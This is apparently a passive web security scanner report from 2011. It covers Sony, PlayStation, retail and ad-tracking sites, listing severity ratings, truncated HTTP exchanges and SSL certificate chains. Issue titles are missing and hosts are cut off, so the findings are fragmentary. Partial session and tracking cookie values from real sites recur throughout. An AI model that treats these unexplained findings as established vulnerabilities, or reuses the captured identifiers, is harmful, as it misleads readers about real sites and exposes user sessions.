GET /m2/sony/mbox/ajax Host: sony.tt.omtrdc.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.sonystyle.com |
HTTP/1.1 200 OK Content-Type: text/JavaScript Content-Length: 226 Date: Sun, 15 May 2011 21:19:58 GMT Server: Test & Target mboxFactories.get( ...[SNIP]... |
Severity: | Medium |
Confidence: | Firm |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /m2/sonycomputerentertai Host: sonycomputerentertai.tt Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Type: text/javascript Content-Length: 163 Date: Sun, 15 May 2011 20:26:48 GMT Server: Test & Target mboxFactories.get( |
Severity: | Medium |
Confidence: | Firm |
Host: | http://sonycomputere |
Path: | /m2/sonycomputerentertai |
GET /m2/sonycomputerentertai Host: sonycomputerentertai.tt Proxy-Connection: keep-alive Referer: http://us.playstation.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Content-Length: 220 Date: Sun, 15 May 2011 20:26:45 GMT Server: Test & Target if (typeof(mboxFactories) !== 'undefined') {mboxFactories.get( ...[SNIP]... |
Severity: | Medium |
Confidence: | Certain |
Host: | https://www.mcafeesecure |
Path: | / |
Issued to: | *.mcafeesecure.com |
Issued by: | NAI SSL CA v1 |
Valid from: | Wed May 28 11:56:43 CDT 2008 |
Valid to: | Fri Apr 26 04:29:07 CDT 2019 |
Issued to: | NAI SSL CA v1 |
Issued by: | RSA Public Root CA v1 |
Valid from: | Wed Oct 17 10:03:55 CDT 2007 |
Valid to: | Mon Apr 29 04:25:17 CDT 2019 |
Issued to: | RSA Public Root CA v1 |
Issued by: | http://www.valicert.com/ |
Valid from: | Mon May 02 12:34:48 CDT 2005 |
Valid to: | Tue Apr 30 04:24:00 CDT 2019 |
Issued to: | http://www.valicert.com/ |
Issued by: | http://www.valicert.com/ |
Valid from: | Fri Jun 25 19:22:33 CDT 1999 |
Valid to: | Tue Jun 25 19:22:33 CDT 2019 |
Severity: | Information |
Confidence: | Certain |
Host: | https://store.playstation |
Path: | / |
Issued to: | store.playstation.com |
Issued by: | PositiveSSL CA |
Valid from: | Mon Dec 08 18:00:00 CST 2008 |
Valid to: | Fri Dec 09 17:59:59 CST 2011 |
Issued to: | PositiveSSL CA |
Issued by: | UTN-USERFirst-Hardware |
Valid from: | Sun Sep 17 19:00:00 CDT 2006 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | UTN-USERFirst-Hardware |
Issued by: | AddTrust External CA Root |
Valid from: | Tue Jun 07 03:09:10 CDT 2005 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Issued to: | AddTrust External CA Root |
Issued by: | AddTrust External CA Root |
Valid from: | Tue May 30 05:48:38 CDT 2000 |
Valid to: | Sat May 30 05:48:38 CDT 2020 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.fingerhut.com |
Path: | / |
Issued to: | *.fingerhut.com,ST=MINNESOTA |
Issued by: | Akamai Subordinate CA 3 |
Valid from: | Thu Sep 23 12:29:22 CDT 2010 |
Valid to: | Fri Sep 23 12:29:22 CDT 2011 |
Issued to: | Akamai Subordinate CA 3 |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Thu May 11 10:32:00 CDT 2006 |
Valid to: | Sat May 11 18:59:00 CDT 2013 |
Issued to: | GTE CyberTrust Global Root |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Wed Aug 12 19:29:00 CDT 1998 |
Valid to: | Mon Aug 13 18:59:00 CDT 2018 |
Severity: | Information |
Confidence: | Certain |
Host: | https://www.sonystyle.com |
Path: | / |
Issued to: | www.sonystyle.com,ST=California |
Issued by: | Akamai Subordinate CA 3 |
Valid from: | Fri Mar 18 13:54:45 CDT 2011 |
Valid to: | Sun Mar 18 13:54:45 CDT 2012 |
Issued to: | Akamai Subordinate CA 3 |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Thu May 11 10:32:00 CDT 2006 |
Valid to: | Sat May 11 18:59:00 CDT 2013 |
Issued to: | GTE CyberTrust Global Root |
Issued by: | GTE CyberTrust Global Root |
Valid from: | Wed Aug 12 19:29:00 CDT 1998 |
Valid to: | Mon Aug 13 18:59:00 CDT 2018 |
Severity: | Low |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:43 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 108383 Cache-Control: public, max-age=19338 Expires: Mon, 16 May 2011 07:05:34 GMT Date: Mon, 16 May 2011 01:43:16 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... </div>'; //learn step 1 var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions ...[SNIP]... </label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://shoprunner.force |
Path: | /content/JsContentEl |
GET /content/JsContentEl Host: shoprunner.force.com Proxy-Connection: keep-alive Referer: http://www.petsmart.com/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: X-Powered-By: Salesforce.com ApexPages P3P: CP="CUR OTR STA" Last-Modified: Mon, 16 May 2011 01:05:40 GMT Content-Type: text/javascript; charset=UTF-8 Vary: Accept-Encoding Content-Length: 106125 Cache-Control: public, max-age=19577 Expires: Mon, 16 May 2011 07:05:43 GMT Date: Mon, 16 May 2011 01:39:26 GMT Connection: close function sr_run(){ return false } /* ------------------------- * Global Variables ------------------------- //the shoprunner object var sr_$={}; sr_$.contents={} ...[SNIP]... </div>'; //learn step 1 var s1_form='<form action="step1" id="sr_lrn1F" name="sr_step1" onsubmit="if(sr_$.actions ...[SNIP]... </label><input class="sr_vpassword" name="password2" tabindex="1" type="password"></li> ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://0.gravatar.com |
Path: | /avatar/4c44589c9d07 |
GET /avatar/4c44589c9d07 Host: 0.gravatar.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Date: Mon, 16 May 2011 01:26:59 GMT Expires: Mon, 16 May 2011 01:31:59 GMT Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT Location: http://a37dcf848d117e562 Server: nginx Source-Age: 0 Via: 1.1 varnish X-Varnish: 31704862 Content-Length: 0 |
Severity: | Low |
Confidence: | Certain |
Host: | http://0.gravatar.com |
Path: | /avatar/6a69081c59ca |
GET /avatar/6a69081c59ca Host: 0.gravatar.com Proxy-Connection: keep-alive Referer: http://www.magicalki User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Cache-Control: max-age=300 Content-Type: text/html; charset=utf-8 Date: Mon, 16 May 2011 01:27:40 GMT Expires: Mon, 16 May 2011 01:32:40 GMT Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT Location: http://a6af26a7fbd4f4778 Server: nginx Source-Age: 0 Via: 1.1 varnish X-Varnish: 254796213 Content-Length: 0 |
Severity: | Low |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /click%3Bh%3Dv8/3b09/f/8c |
GET /click%3Bh%3Dv8/3b09/f/8c Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://.a7d6d1ac935dd610b Date: Mon, 16 May 2011 01:43:55 GMT Server: GFE/2.0 Content-Type: text/html |
Severity: | Low |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /r |
GET /r?c2=6035140&d.c=http%3a//a64830d9ddb Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=64dfc632-184.84.247 |
HTTP/1.1 302 Moved Temporarily Content-Length: 0 Location: http://a64830d9ddb512cd7 Date: Mon, 16 May 2011 01:29:00 GMT Connection: close Set-Cookie: UID=64dfc632-184.84.247 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID OUR IND COM STA OTC" Expires: Mon, 01 Jan 1990 00:00:00 GMT Pragma: no-cache Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate Server: CS |
Severity: | Low |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /bh/rtset |
GET /bh/rtset?do=add&ev Host: bh.contextweb.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: cwbh1=2532%3B06%2F14 |
HTTP/1.1 302 Moved Temporarily Server: Sun GlassFish Enterprise Server v2.1 CW-Server: cw-web82 Cache-Control: no-cache, no-store Set-Cookie: V=8vciuQJMXXJY; Domain=.contextweb.com; Expires=Thu, 10-May-2012 01:26:26 GMT; Path=/ Set-Cookie: pb_rtb_ev=1:535495 Location: http://ac0ccb34eb9b5804f Content-Type: text/html; charset=iso-8859-1 Content-Length: 0 Date: Mon, 16 May 2011 01:26:25 GMT P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" |
Severity: | Low |
Confidence: | Certain |
Host: | http://i.w55c.net |
Path: | /ping_match.gif |
GET /ping_match.gif?ei Host: i.w55c.net Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: wfivefivec=ea5c094a-3a81 |
HTTP/1.1 302 Found Set-Cookie: wfivefivec=ea5c094a-3a81 X-Version: DataXu Pixel Tracker v3 Cache-Control: private Location: http://a763ba70336584003 Server: Jetty(6.1.22) Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 0 |
Severity: | Low |
Confidence: | Certain |
Host: | http://p.brilig.com |
Path: | /contact/bct |
GET /contact/bct?pid=21008FFD Host: p.brilig.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Moved Temporarily Cache-Control: no-cache,no-store,must Content-Type: text/plain Date: Mon, 16 May 2011 01:25:21 GMT Expires: Mon, 19 Dec 1983 01:25:21 GMT Location: http://.ace303c9612d378c9 P3P: CP="NOI DSP COR CURo DEVo TAIo PSAo PSDo OUR BUS UNI COM" Pragma: no-cache Server: Apache/2.2.16 (Ubuntu) Set-Cookie: BriligContact=98af0ff8 X-Brilig-D: D=3120 Content-Length: 0 Connection: keep-alive |
Severity: | Low |
Confidence: | Certain |
Host: | http://pixel.invitemedia |
Path: | /pubmatic_sync |
GET /pubmatic_sync?pubmatic Host: pixel.invitemedia.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: exchange_uid="eyI0Ij |
HTTP/1.0 302 Found Server: IM BidManager Date: Mon, 16 May 2011 01:19:52 GMT Expires: Mon, 16-May-2011 01:19:32 GMT Location: http://a730fdf10bea4fa87 Pragma: no-cache Cache-Control: no-cache P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Content-Type: text/plain |
Severity: | Low |
Confidence: | Certain |
Host: | http://r.nexac.com |
Path: | /e/getdata.xgi |
GET /e/getdata.xgi?dt=br&pkey Host: r.nexac.com Proxy-Connection: keep-alive Referer: http://d.xp1.ru4.com/meta User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Expires: Wed Sep 15 09:14:42 MDT 2010 Pragma: no-cache P3P: policyref="http://www Set-Cookie: na_tc=Y; expires=Thu,12-Dec-2030 22:00:00 GMT; domain=.nexac.com; path=/ X-Powered-By: Jigawatts Location: http://ab6f780051a3efd99 Content-type: text/html Date: Mon, 16 May 2011 01:20:05 GMT Server: lighttpd/1.4.18 Content-Length: 1 |
Severity: | Low |
Confidence: | Certain |
Host: | http://s.ixiaa.com |
Path: | /digi/9D763773-52FA-4D45 |
GET /digi/9D763773-52FA-4D45 Host: s.ixiaa.com Proxy-Connection: keep-alive Referer: http://tags.bluekai.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 302 Found Server: nginx Date: Mon, 16 May 2011 01:39:30 GMT Content-Type: text/html Connection: keep-alive X-Powered-By: PHP/5.3.3 Location: http://acc0cdbab0fd100dc X-ClientIP: 173.193.214.243 Content-Length: 3 ... |
Severity: | Low |
Confidence: | Certain |
Host: | http://sync.mathtag.com |
Path: | /sync/img |
GET /sync/img?mt_exid=11&type Host: sync.mathtag.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uuid=4dd07bc8-e97b-118c |
HTTP/1.1 302 Found Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x3 pid 0x7852 30802 Cache-Control: no-cache P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Date: Mon, 16 May 2011 01:28:24 GMT Location: http://aa2ac0a4f56b5cd42 Etag: 4dd07bc8-e97b-118c-3dec Connection: Keep-Alive Set-Cookie: ts=1305509304; domain=.mathtag.com; path=/; expires=Tue, 15-May-2012 01:28:24 GMT Content-Length: 0 |
Severity: | Low |
Confidence: | Firm |
Host: | http://eval.bizrate.com |
Path: | /js/survey_126457_1.js |
GET /js/survey_126457_1.js HTTP/1.1 Host: eval.bizrate.com Proxy-Connection: keep-alive Referer: http://www.gnc.com/home User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: trafficSourceDebugParam=; Domain=.bizrate.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ P3P: CP="NON DSP ADM DEV PSD CUSo OUR IND STP PRE NAV UNI" Pragma: No-cache Expires: Thu, 01 Jan 1970 00:00:00 GMT Cache-Control: no-cache Cache-Control: no-store Set-Cookie: sessionid=7202325108 Set-Cookie: br=13055101949906417 Set-Cookie: _data=_time%3A%3Astart Content-Type: text/html;charset=ISO Content-Language: en-US Date: Mon, 16 May 2011 01:43:13 GMT Content-Length: 16130 <!-- // hide script var BIZRATE = { init:function() { this.mid = '126457'; this.type = 1; if (typeof(this.type) != 'undefined' && this.type > 0 && this.type <= 3) { ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://sony.links.origin |
Path: | /pages/wl.asp |
GET /pages/wl.asp?nCTID=0 Host: sony.links.origin Proxy-Connection: keep-alive Referer: http://sony.links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: serverstamp=4B88CCEA-94CF |
HTTP/1.1 302 Object moved Date: Sun, 15 May 2011 20:26:46 GMT Server: Microsoft-IIS/6.0 P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP" pragma: no-cache Location: http://ttwbs.channel Content-Length: 667 Content-Type: image/gif Expires: Sun, 15 May 2011 20:25:46 GMT Set-Cookie: sessionstamp=1186043; expires=Sun, 15-May-2011 21:26:46 GMT; domain=.channelintel Set-Cookie: serverstamp=4B88CCEA Set-Cookie: ASPSESSIONIDACQQQDBC Cache-control: private <head><title>Object moved</title></head> <body><h1>Object Moved</h1>This object may be found <a HREF="http://ttwbs ...[SNIP]... |
Severity: | Low |
Confidence: | Firm |
Host: | http://ttwbs.channel |
Path: | / |
GET /?eid=203&oid=6553221 Host: ttwbs.channelintelligence Proxy-Connection: keep-alive Referer: http://sony.links User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: sessionstamp=1186043; serverstamp=4B88CCEA |
HTTP/1.1 302 Found Expires: Thu, 01 Jan 1970 00:00:00 GMT Set-Cookie: sessionstamp=1186043 Cache-Control: private Location: http://r.turn.com/r Server: Jetty(6.1.22) Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a) Connection: keep-alive Content-Length: 0 |
Severity: | Low |
Confidence: | Firm |
Host: | http://www.popularmedia |
Path: | /widget/2be74c3e1d1b |
GET /widget/2be74c3e1d1b Host: www.popularmedia.net Proxy-Connection: keep-alive Referer: http://secureshopping User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:40:28 GMT Server: Mongrel 1.1.5 Status: 200 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM" X-Runtime: 24 Pragma: no-cache Cache-Control: no-cache, must-revalidate, max-age=0 Content-Type: text/javascript; charset=utf-8 Expires: 0 Set-Cookie: _ia_sess_1=bc86b4dc7 Vary: Accept-Encoding Content-Length: 47368 (function() { /* var head = document.getElements var script = document.createElement( script.src = "http://platform.twitter scri ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://a.tribalfusion.com |
Path: | /j.ad |
GET /j.ad?site=pastebincom Host: a.tribalfusion.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1 Accept: */* Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://pastebin.com Cookie: ANON_ID=a5nu7qsjyDsA |
HTTP/1.1 200 OK P3P: CP="NOI DEVo TAIa OUR BUS" X-Function: 101 X-Reuse-Index: 1 Pragma: no-cache Cache-Control: private, no-cache, no-store, proxy-revalidate Set-Cookie: ANON_ID=amnufry4Zaw4 Content-Type: application/x-javascript Vary: Accept-Encoding Content-Length: 2150 Expires: 0 Connection: keep-alive document.write('<script language=\'javascript\'> ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://action.media6 |
Path: | /orbserv/hbpix |
GET /orbserv/hbpix?pixId=1628 HTTP/1.1 Host: action.media6degrees.com Proxy-Connection: keep-alive Referer: http://www.armaniexchange User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: JSESSIONID=BDC5BFE2B |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: CP="COM NAV INT STA NID OUR IND NOI" Pragma: no-cache Cache-Control: no-cache Set-Cookie: adh=""; Domain=media6degrees.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: clid=2ll77mm01171voo Set-Cookie: orblb=2ll8nk2031zw10 Set-Cookie: rdrlst=4090spbll9m03 Set-Cookie: sglst=2050s90ill9m03 Set-Cookie: vstcnt=418b010r01496 Content-Type: image/gif Content-Length: 43 Date: Mon, 16 May 2011 01:43:17 GMT GIF89a.............!..... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/ads.js |
GET /server/ads.js?pub Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: public Cache-Control: max-age=172800 Cache-Control: must-revalidate Expires: Wed, 18 May 2011 01:40:38 GMT Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:40:38 GMT; Path=/ Set-Cookie: bp=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: bd=""; Domain=.turn.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/ Set-Cookie: adImpCount=z8H5DIFkJ Set-Cookie: fc=VBzn51JQz0zltCfNS Set-Cookie: pf=_ueUnCc1-Qecqj3JV Content-Type: text/javascript;charset Vary: Accept-Encoding Date: Mon, 16 May 2011 01:40:38 GMT Content-Length: 11133 var detect = navigator.userAgent function checkIt(string) { return detect.indexOf(string) >= 0; } var naturalImages = new Array; naturalImageOnLoad = function() { if (this.width ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:50 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:19:49 GMT Content-Length: 335 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG5+^Cxrx)0s]# |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:22:39 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3420415245200633085 Content-Type: application/x-javascript Date: Mon, 16 May 2011 01:22:39 GMT Content-Length: 155 document.write('<img src="http://tag.admeld |
Severity: | Information |
Confidence: | Certain |
Host: | http://ads.revsci.net |
Path: | /adserver/ako |
GET /adserver/ako?activate Host: ads.revsci.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: NETID01=f6600bc0a975 |
